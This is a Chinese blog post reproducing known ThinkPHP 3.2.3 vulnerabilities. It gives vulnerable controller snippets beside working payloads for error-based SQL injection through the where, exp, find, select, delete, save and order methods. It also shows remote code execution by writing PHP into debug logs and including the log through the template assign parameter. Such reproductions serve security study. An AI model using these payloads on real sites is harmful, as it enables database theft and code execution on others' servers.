IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		图片批量下载器
↓批量下载图片,美女图库↓ 		图片自动播放器
↓图片自动播放器↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> [复现]Thinkphp3.2.3 漏洞 -> 正文阅读

[PHP知识库][复现]Thinkphp3.2.3 漏洞

前言

纸上得来终觉浅,绝知此事要躬行。

缓存函数

注意 S() F() 函数 可控时会造成危害。

日志泄露

ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且日志结构容易被猜解,造成信息泄露。
THINKPHP3.1结构:Runtime/Logs/Home/年份_月份_日期.log
THINKPHP3.2 结构:Application/Runtime/Logs/Home/年份_月份_日期.log
6
需要注意的是日志的路径不是绝对的,开发者可以修改的,平时可以收集下用时fuzz。

SQL 注入

user表
user

一个小例子

代码如下

$id = I("get.id");
$data = M("user")->where("id=$id")->find();
dump($data);

变量虽然用I()函数获取,但是直接拼接变量,造成SQL注入。
id=1) and updatexml(1,concat(0x7e, user(), 0x7e),1)--
在这里插入图片描述

exp注入

$name = $_GET['name'];
$data = M("user")->where(array("name"=>$name))->find();
dump($data);

变量必须是原生函数获取,如果使用I函数无法注入,where方法内传入的必须是数组而且可控。
name[0]=exp&name[1]=='' and updatexml(1,concat(0x7e,user(),0x7e),1)--
在这里插入图片描述

find/select/delete注入

$id = I('id');
$res = M("user")->find($id);
//$res = M("user")->select($id);
//$res = M("user")->delete($id);
dump($res);

演示下find()方法注入。
2
小结:

find() select()方法注入

id[table]=user where 1 and updatexml(1,concat(0x7e,user(),0x7e),1)--
id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

delete()方法注入

id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1

update() 注入

$user['name'] = I("name");
$data['pass'] = I("pass");
$res = M("user")->where($user)->save($data);
dump($res);

user数组可控,变量用I函数获取,且使用save()方法。
name[0]=bind&name[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)--&pass=1
3

order注入

$name = I("name");
$order = I("order");
$res = M("user")->where(["name" => $name])->order($order)->find();
dump($res);

order()方法参数可控
order[updatexml(1,concat(0x3a,user()),1)]

5

RCE

业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。

$value = I("get.value");
$this->assign($value);
$this->display();

利用日志包含,先将payload写入日志内。

 /index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?>

6
包含并执行日志内的代码

index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_08_02.log

在这里插入图片描述
不一定要包含日志,只要能上传并解析代码就行。

参考

https://xz.aliyun.com/t/2629#toc-1
https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ
  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章           查看所有文章
加:2021-08-04 10:58:37  更:2021-08-04 11:00:38 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2025年2日历 -2025/2/27 2:01:28-

图片自动播放器
↓图片自动播放器↓ 		TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓ 		图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码